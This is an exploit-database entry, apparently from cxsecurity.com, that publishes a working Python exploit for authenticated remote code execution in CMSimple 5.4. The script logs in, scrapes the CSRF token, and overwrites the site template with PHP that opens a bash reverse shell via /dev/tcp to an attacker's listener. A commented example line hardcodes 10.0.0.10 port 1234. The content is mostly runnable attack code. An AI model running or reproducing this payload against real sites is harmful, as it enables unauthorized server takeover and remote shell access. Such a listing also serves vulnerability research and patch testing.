Cmsimple 5.4 Remote Code Execution

2021.10.02
Credit: pussycat0x
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Cmsimple 5.4 - Remote Code Execution (RCE) (Authenticated) # Date: 29.09.2021 # Exploit Author: pussycat0x # Vendor Homepage: https://www.cmsimple.org/ # Version: 5.4 # Tested on: ubuntu-20.04.1 import argparse from bs4 import BeautifulSoup from argparse import ArgumentParser import requests parser= ArgumentParser(description="cmsimple ", epilog='cmsimpleRCE.py -url targetdomai.com -u username -p password -ip lhost -lp lport') rparser = parser.add_argument_group('required argument') rparser.add_argument('-url','--host', type=str, help='target domain',required=True) rparser.add_argument('-u' ,'--username', type=str, help='', required=True) rparser.add_argument('-p','--password',type=str,help='', required=True) rparser.add_argument('-ip','--lhost',type=str,help='listener ip', required=True) rparser.add_argument('-lp','--lport', type=str,help='listener port', required=True) args= parser.parse_args() #url ='192.168.1.106' s = requests.Session() def main(): try: url =(args.host) payload = { 'user':args.username, 'passwd':args.password, 'submit': 'Login', 'login':'true', } login=s.post(url +'/?Welcome_to_CMSimple_5',data=payload) if login.status_code == 200: print('Exploit Completed') else: print("Invalid Credential") cook =(login.cookies.get_dict()) temp = s.get(url +'/?file=template&action=edit', cookies=cook) soup = BeautifulSoup(temp.text, 'lxml') csrfToken = soup.find('input',attrs = {'name':'csrf_token'})['value'] #<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); rev = """<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/""" rev2=(args.lhost) rev3=(args.lport) rev4=""" 0>&1'");""" php =(rev+rev2+'/'+rev3+rev4) revpayload = { 'cmsimpleDataFileStored':'cmsimpleDataFileStored', 'csrf_token':csrfToken, 'text':php, 'file':'template', 'action':'save', } shell = s.post(url +'/',cookies=cook , data=revpayload) exec = s.get(url+'/') exit() except: pass main()


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top